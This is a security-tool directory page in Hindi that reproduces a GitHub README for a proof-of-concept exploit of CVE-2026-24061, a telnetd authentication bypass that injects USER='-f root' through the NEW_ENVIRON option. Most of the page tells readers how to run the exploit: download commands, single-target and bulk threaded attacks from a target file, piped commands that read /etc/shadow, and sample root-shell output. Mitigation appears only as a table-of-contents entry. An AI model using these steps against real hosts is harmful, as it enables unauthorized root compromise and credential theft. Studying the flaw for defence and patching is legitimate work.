Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — प्रूफ ऑफ कॉन्सेप्ट: CVE-2026-24061 GNU inetutils-telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत दूरस्थ हमलावरों को दुर्भावनापूर्ण NEW_ENVIRON टेलनेट विकल्प शोषण के माध्यम से तुरंत रूट शेल एक्सेस प्राप्त करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/sh4den/cve-2026-24061
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणपेपर और शोधलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubsh4den/cve-2026-24061
61112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061

प्रूफ ऑफ कॉन्सेप्ट: CVE-2026-24061 GNU inetutils-telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत दूरस्थ हमलावरों को दुर्भावनापूर्ण NEW_ENVIRON टेलनेट विकल्प शोषण के माध्यम से तुरंत रूट शेल एक्सेस प्राप्त करने की अनुमति देता है।

रिपॉजिटरी देखें

CVE-2026-24061

GNU inetutils-telnetd - दूरस्थ प्रमाणीकरण बाईपास

CVE-2026-24061 का शोषण करने के लिए एक सुरक्षा अनुसंधान उपकरण, जो GNU inetutils-telnetd में एक गंभीर दूरस्थ प्रमाणीकरण बाईपास भेद्यता है, जो बिना प्रमाणीकरण के तत्काल रूट शेल एक्सेस की अनुमति देता है।


विषय सूची

  • भेद्यता सारांश
  • प्रभावित संस्करण
  • तकनीकी विश्लेषण
  • आवश्यक शर्तें
  • स्थापना
  • उपयोग
  • आउटपुट संदर्भ
  • शोषण पद्धति
  • शमन और सुधार
  • समझौता के संकेत
  • कानूनी अस्वीकरण
  • संदर्भ
  • श्रेय

भेद्यता सारांश

फ़ील्डमान
CVE पहचानकर्ताCVE-2026-24061
CVSS v3.1 स्कोर9.8 (गंभीर)
CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE वर्गीकरणCWE-88: कमांड में तर्क सीमांकक का अनुचित निष्प्रभावीकरण
विक्रेताGNU परियोजना
उत्पादinetutils-telnetd
प्रकटीकरण तिथि20 जनवरी, 2026
पैच उपलब्धनिर्धारित किया जाना है (TBD)

कार्यकारी सारांश

GNU inetutils-telnetd में संस्करण 2.7 तक एक गंभीर भेद्यता मौजूद है जो अप्रमाणित दूरस्थ हमलावरों को प्रमाणीकरण को पूरी तरह से बायपास करने और तत्काल रूट शेल एक्सेस प्राप्त करने की अनुमति देती है। इस भेद्यता का शोषण NEW_ENVIRON टेलनेट विकल्प के माध्यम से एक विशेष रूप से तैयार USER पर्यावरण चर को मान "-f root" के साथ इंजेक्ट करके किया जाता है, जो सभी प्रमाणीकरण तंत्रों को बायपास कर देता है।

प्रभाव मूल्यांकन

  • गोपनीयता: सिस्टम डेटा का पूर्ण समझौता
  • अखंडता: रूट विशेषाधिकारों के साथ पूर्ण सिस्टम नियंत्रण
  • उपलब्धता: पूर्ण सिस्टम अधिग्रहण या सेवा से वंचित करने की संभावना
  • दायरा: अपरिवर्तित - शोषण केवल कमजोर टेलनेट सेवा को प्रभावित करता है

प्रभावित संस्करण

संस्करण श्रेणीस्थिति
<= 2.7कमजोर
> 2.7पैच स्थिति निर्धारित की जानी है (TBD)

तकनीकी विश्लेषण

भेद्यता का मूल कारण

यह भेद्यता telnetd के NEW_ENVIRON विकल्प हैंडलर में USER पर्यावरण चर के अनुचित सत्यापन से उत्पन्न होती है। NEW_ENVIRON टेलनेट विकल्प को संसाधित करते समय, telnetd सेवा USER चर मान को लॉगिन प्रक्रिया में भेजने से पहले सैनिटाइज करने में विफल रहती है। USER को "-f root" पर सेट करके, हमलावर कमांड-लाइन तर्क इंजेक्ट करता है जो बिना क्रेडेंशियल्स के रूट उपयोगकर्ता के लिए प्रमाणीकरण को सफल करने के लिए मजबूर करता है।

हमला वेक्टर

  1. हमलावर telnetd सेवा (आमतौर पर पोर्ट 23) से जुड़ता है
  2. टेलनेट विकल्प वार्ता के दौरान, सर्वर NEW_ENVIRON डेटा का अनुरोध करता है
  3. हमलावर USER पर्यावरण चर को "-f root" पर सेट करके प्रतिक्रिया देता है
  4. दुर्भावनापूर्ण तर्क प्रमाणीकरण जांच को बायपास कर देता है
  5. बिना किसी पासवर्ड प्रॉम्प्ट के तत्काल रूट शेल प्रदान किया जाता है
  6. पूर्ण सिस्टम समझौता प्राप्त होता है

शोषण जटिलता

  • आवश्यक शर्तें: लक्ष्य telnetd सेवा तक नेटवर्क पहुँच
  • प्रमाणीकरण: आवश्यक नहीं
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • हमला जटिलता: कम

आवश्यक शर्तें

सिस्टम आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • लक्ष्य telnetd इंस्टेंस के लिए नेटवर्क कनेक्टिविटी
  • Python स्क्रिप्ट निष्पादित करने के लिए पर्याप्त अनुमतियाँ

निर्भरताएँ

सभी निर्भरताएँ Python की मानक लाइब्रेरी का हिस्सा हैं:

पैकेजउद्देश्य
socketनेटवर्क संचार
selectI/O मल्टीप्लेक्सिंग
sysसिस्टम इंटरैक्शन
osऑपरेटिंग सिस्टम इंटरफ़ेस
threadingसमवर्ती लक्ष्य शोषण
datetimeटाइमस्टैम्प फ़ॉर्मेटिंग

स्थापना

विधि 1: Git का उपयोग करना

# रिपॉजिटरी क्लोन करें
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# शोषण चलाएँ
python3 main.py -u <target_ip>

विधि 2: प्रत्यक्ष डाउनलोड

# शोषण डाउनलोड करें
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# इसे निष्पादन योग्य बनाएँ (Linux/macOS)
chmod +x main.py

# शोषण चलाएँ
python3 main.py -u <target_ip>

विधि 3: मैन्युअल स्थापना

# सुनिश्चित करें कि Python 3.7+ स्थापित है
python3 --version

# डाउनलोड करें और चलाएँ
python3 main.py -u <target_ip>

उपयोग

कमांड लाइन इंटरफ़ेस

Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          एकल लक्ष्य IP पता या होस्टनाम
    -l          लक्ष्य IP वाली फ़ाइल का पथ (प्रति पंक्ति एक)
    -p          लक्ष्य पोर्ट (डिफ़ॉल्ट: 23)
    -usr        शोषण के लिए उपयोगकर्ता (डिफ़ॉल्ट: root)

एकल लक्ष्य शोषण

एकल telnetd इंस्टेंस का शोषण करें:

# मूल शोषण (डिफ़ॉल्ट पोर्ट 23, उपयोगकर्ता root)
python3 main.py -u 192.168.1.100

# कस्टम पोर्ट
python3 main.py -u 192.168.1.100 -p 2323

# भिन्न उपयोगकर्ता
python3 main.py -u 192.168.1.100 -usr admin

कमांड निष्पादन मोड

गैर-इंटरैक्टिव रूप से कमांड निष्पादित करें:

# एकल कमांड
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# एकाधिक कमांड
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# आउटपुट रीडायरेक्शन के साथ कमांड
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

बल्क लक्ष्य शोषण

फ़ाइल से एकाधिक लक्ष्यों का शोषण करें:

python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

लक्ष्य फ़ाइल प्रारूप (targets.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

नोट्स:

  • प्रति पंक्ति एक लक्ष्य
  • IP पते या होस्टनाम
  • खाली पंक्तियों को अनदेखा किया जाता है
  • लक्ष्यों का शोषण थ्रेडिंग का उपयोग करके समवर्ती रूप से किया जाता है

आउटपुट संदर्भ

स्थिति संकेतक

संकेतकरंगविवरण
[SUCCESS]हरालक्ष्य से सफलतापूर्वक जुड़ा
[EXPLOIT]हराशोषण पेलोड सफलतापूर्वक भेजा गया
[INFO]नीलावर्तमान ऑपरेशन के बारे में सूचनात्मक संदेश
[ERROR]लालकनेक्शन विफलता, टाइमआउट, या शोषण त्रुटि
[WARNING]पीलाचेतावनी संदेश (वर्तमान में उपयोग नहीं किया गया)

नमूना आउटपुट

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

शोषण पद्धति

टेलनेट प्रोटोकॉल वार्ता प्रक्रिया

शोषण टेलनेट प्रोटोकॉल वार्ता चरण का लाभ उठाता है:

  1. प्रारंभिक कनेक्शन: लक्ष्य पोर्ट पर TCP कनेक्शन स्थापित होता है
  2. विकल्प वार्ता: सर्वर विभिन्न टेलनेट विकल्पों के लिए DO/WILL कमांड भेजता है
  3. TTYPE समझौता: क्लाइंट टर्मिनल प्रकार भेजने के लिए सहमत होता है (WILL TTYPE)
  4. TSPEED समझौता: क्लाइंट टर्मिनल गति भेजने के लिए सहमत होता है (WILL TSPEED)
  5. NEW_ENVIRON समझौता: क्लाइंट पर्यावरण चर भेजने के लिए सहमत होता है (WILL NEW_ENVIRON)
  6. उप-वार्ता: सर्वर पर्यावरण चर का अनुरोध करता है (SB NEW_ENVIRON SEND)
  7. पेलोड इंजेक्शन: क्लाइंट NEW_ENVIRON प्रतिक्रिया में USER="-f root" भेजता है
  8. प्रमाणीकरण बाईपास: सर्वर दुर्भावनापूर्ण USER चर को संसाधित करता है
  9. शेल एक्सेस: बिना प्रमाणीकरण के रूट शेल प्रदान किया जाता है

पेलोड संरचना

# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39
टूल डाउनलोड करें